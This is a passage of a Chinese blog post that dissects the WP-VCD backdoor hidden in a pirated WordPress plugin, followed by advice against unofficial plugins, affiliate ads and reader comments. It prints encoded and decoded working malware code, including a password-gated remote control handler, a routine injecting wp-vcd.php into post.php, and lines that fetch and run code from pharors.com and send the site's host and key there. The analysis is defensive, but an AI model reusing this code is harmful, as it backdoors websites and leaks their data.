QkJCQkJCXsKCQkJCQkJCQkJCQlpZiAoc3RycG9zKCRjb250ZW50LCAnV1BfVl9DRCcpID09PSBmYWxzZSkKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJJGNvbnRlbnQgPSAkaW5zdGFsbF9jb2RlIC4gJGNvbnRlbnQgOwoJCQkJCQkJCQkJCQkJQGZpbGVfcHV0X2NvbnRlbnRzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnLCAkY29udGVudCk7CgkJCQkJCQkJCQkJCQl0b3VjaCggJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcgLCAkdGltZSApOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQkJZWxzZQoJCQkJCQkJCQkJCQl7CgkJCQkJCQkJCQkJCQkkcGluZyA9IGZhbHNlOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJCQkKCQkJCQkJCQl9CgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRsaXN0MiA9IHNjYW5kaXIoICR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8pOwoJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZvcmVhY2ggKCRsaXN0MiBhcyAkXzIpCgkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAJewoJCQkJCQkJCQkJCQkJCQkKCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfMiAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQoJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICB7CgkJCQkJCQkJCSR0aW1lID0gZmlsZWN0aW1lKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyk7CgkJCQkJCQkJCQkKCQkJCQkJCQkJaWYgKCRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKSkKCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQlpZiAoc3RycG9zKCRjb250ZW50LCAnV1BfVl9DRCcpID09PSBmYWxzZSkKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJJGNvbnRlbnQgPSAkaW5zdGFsbF9jb2RlIC4gJGNvbnRlbnQgOwoJCQkJCQkJCQkJCQkJQGZpbGVfcHV0X2NvbnRlbnRzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJywgJGNvbnRlbnQpOwoJCQkJCQkJCQkJCQkJdG91Y2goICR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyAsICR0aW1lICk7CgkJCQkJCQkJCQkJCQkkcGluZzIgPSB0cnVlOwoJCQkJCQkJCQkJCQl9CgoKCgoKCgoKCQkJCQkJCQkJCQllbHNlCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCS8vJHBpbmcgPSBmYWxzZTsKCQkJCQkJCQkJCQkJfQoJCQkJCQkJCQkJfQoJCQkJCQkJCQkJCgkJCQkJCQkJfQoKCgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQl9CgkJCQkJCQoJCQkJCWlmICgkcGluZykgewoJCQkJCQkkY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy5waGFyb3JzLmNvbS9vLnBocD9ob3N0PScgLiAkX1NFUlZFUlsiSFRUUF9IT1NUIl0gLiAnJnBhc3N3b3JkPScgLiAkaW5zdGFsbF9oYXNoKTsKCQkJCQkJLy9AZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICcvd3AtaW5jbHVkZXMvY2xhc3Mud3AucGhwJywgZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly93d3cucGhhcm9ycy5jb20vYWRtaW4udHh0JykpOwoJCQkJCX0KCQkJCQkKCQkJCQkJCQkJCQkJCQkJaWYgKCRwaW5nMikgewoJCQkJCQkkY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy5waGFyb3JzLmNvbS9vLnBocD9ob3N0PScgLiAkX1NFUlZFUlsiSFRUUF9IT1NUIl0gLiAnJnBhc3N3b3JkPScgLiAkaW5zdGFsbF9oYXNoKTsKCQkJCQkJLy9AZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy9jbGFzcy53cC5waHAnLCBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy5waGFyb3JzLmNvbS9hZG1pbi50eHQnKSk7Ci8vZWNobyBBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCc7CgkJCQkJfQoJCQkJCQoJCQkJCQoJCQkJCQoJCQkJfQoJCQoKCgoKPz48P3BocCBlcnJvcl9yZXBvcnRpbmcoMCk7Pz4=';
step 3
Base64 Decode之後,又是一段 php 的程式碼。
我取最上面的三行,又發現一串 Base64 的字串,後面兩行是把這段 Decode。
所以我還是先把 $install_code 拿去 Decode 看看到底長什麼樣子。
$install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nZmRhYTc5YTQ2OTU4Y2JjMWNlM2E1NTc3MThlYzU2NzAnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cucGhhcm9ycy5jb20vY29kZS5waHAiKSBPUiAkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c190Y3VybCgiaHR0cDovL3d3dy5waGFyb3JzLmNvbS9jb2RlLnBocCIpKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKCiAgICAgICAgICAgIGlmIChzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcpKSB7CiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpKSB7CiAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cygnd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICAKICAgICAgICAKICAgICAgICBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnBoYXJvcnMucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cucGhhcm9ycy50b3AvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfQoJCWVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgIAogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7IAoKICAgICAgICB9IGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoJ3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7IAoKICAgICAgICB9IAogICAgICAgIAogICAgICAgIAogICAgICAgIAogICAgICAgIAogICAgICAgIAogICAgfQp9CgovLyRzdGFydF93cF90aGVtZV90bXAKCgoKLy93cF90bXAKCgovLyRlbmRfd3BfdGhlbWVfdG1wCj8+';
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
step 4
這次終於 Decode 完成了,得到最底層的程式碼,先拿第一段來講解。
簡單來說就是在你的網站做了兩個功能,改變你的網域以及改變對方上傳的程式碼。
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}')) {
$div_code_name = "wp_vcd";
switch ($_REQUEST['action']) {
case 'change_domain';
if (isset($_REQUEST['newdomain'])) {
if (!empty($_REQUEST['newdomain'])) {
if ($file = @file_get_contents(__FILE__)) {
if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}}}}
break;
case 'change_code';
if (isset($_REQUEST['newcode'])) {
if (!empty($_REQUEST['newcode'])) {
if ($file = @file_get_contents(__FILE__)) {
if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}}}}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
step 5
接著回到最一開始的 class.plugin-modules.php ,來看看後面的程式碼。
這邊是放一隻 wp-vcd.php 的檔案,到你的資料夾。
function WP_URL_CD($path)
{
if (($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE'])))) {
if (strpos($file, 'wp-vcd') === false) {
$file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
file_put_contents($path . '/wp-includes/post.php', $file);
//@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));
}}}
step 6
後面還有利用SSRF的攻擊以及Phar反序列化的手法。
if ($ping) {
$content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
if ($ping2) {
$content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
結論
這種外掛在你上傳的時候還不會有事,出事的時機點在於你啟用外掛的那一刻。
基本上一啟用,你的網站目錄結構就被改變了,多了很多奇怪的檔案,或是網域被換掉、主機被拿去攻擊別人等等。
三個重點
1. 不要安裝來路不明的外掛!
2. 支持正版、原廠!
3. 養成定期備份的好習慣!
WordPress 線上課程推薦
阿璋正在籌備 WordPress 線上課程,如果有興趣的人,歡迎點擊下方連結。
從 0 開始建立部落格
站長之路手把手教你如何透過部落格開始賺錢,內容包含 WordPress、部落格經營、網路行銷,帶你成為一個成功的部落格站長!
WordPress 架站推薦
新手架站:【架站教學】專門為WordPress打造的主機?WPWebHost 完整教學!高流量網站:【架站教學】新手快速架站教學,使用Cloudways架設WordPress網站!
新手必看: WordPress 必裝主題與外掛推薦、學習管道、最新優惠統整!
學習更多:查看我是如何透過 WordPress 架設部落格,賺取人生第一桶金!
WordPress 學習書籍推薦
WordPress 無敵架站手冊:架站新手都想擁有:教你打造個人專屬網站
書籍介紹
這本書教你從零開始建立起一個全功能的WordPress網站,從下載與安裝WordPress主軟體開始到連結、媒體、選單、圖像、展示區、管理、用家建檔等等。 甚至還有教你如何開發主題、外掛、小工具,從入門到進階的教學都很完整。推薦原因
這本書原作者是波蘭人,原文是英文,後來經由免費資源網路社群的作者 Pseric 翻譯成中文書。 WordPress 目前的中文書可說是少之又少,這本不僅是中文書,內容又非常完整,絕對是學習WordPress的首選書籍!購買 WordPress 無敵架站手冊
WordPress Plugins百大外掛精選(火力加強版)
書籍介紹
這本書教你從基礎架站、備份保存到各式各樣的外掛主題,讓你想裝什麼就裝什麼,建置專屬自己獨一無二的多功能發佈平台。 作者特別精選了各類型的外掛做介紹,只要你想的到的功能幾乎都在裡面,匯集了讀者們一直喜愛的外掛程式介紹,並且添加了最新的外掛程式,更貼近現在的讀者需求。推薦原因
這本書作者是免費資源網路社群的作者 Pseric,他的網站知名度非常的高,也是透過 WordPress 架設而成,因此對於外掛的理解,絕對是數一數二。購買 WordPress Plugins 百大外掛精選(火力加強版)
支持阿璋的新書《打開網路就有錢》,裡面分享許多自媒體以及投資理財的知識,非常適合網路創業者以及想要增加額外收入的上班族閱讀。
如果你對幣圈資訊有興趣,可以訂閱此電子報:幣圈最新資訊
我目前有成立一個亞洲最大的幣圈自媒體 Discord 社群:Crypto Mind 加密腦
推坑阿璋超愛的商品,歡迎加入團購群:阿璋好物團購 LINE 社群
12篇文章手把手教你如何透過部落格開始賺錢:站長之路
更多相關社群連結:工具王阿璋社群列表
本站有部分連結與商家有合作關係,透過我的連結購買,我會獲得少數佣金,讓我可以持續營運網站,但並不會影響您的任何權益,詳情查看免責聲明。
如果我的文章對你有幫助,歡迎贊助我一杯咖啡!
本站所有內容皆為阿璋個人經驗分享,如有涉及投資請謹慎評估,阿璋不做任何投資建議。
文章引用請來信索取授權,否則將保留法律追訴權。
by Johntool-工具王阿璋
請問有專門的外掛可以檢查出網站是否有惡意代碼的外掛嗎?
比較知名的像是 Sucurl 跟 Malcare,但還是要找官方來源下載!
那推資詭異的資料夾是gravity form的addons啦
原來如此,感謝說明,不過我的重點不是放在那邊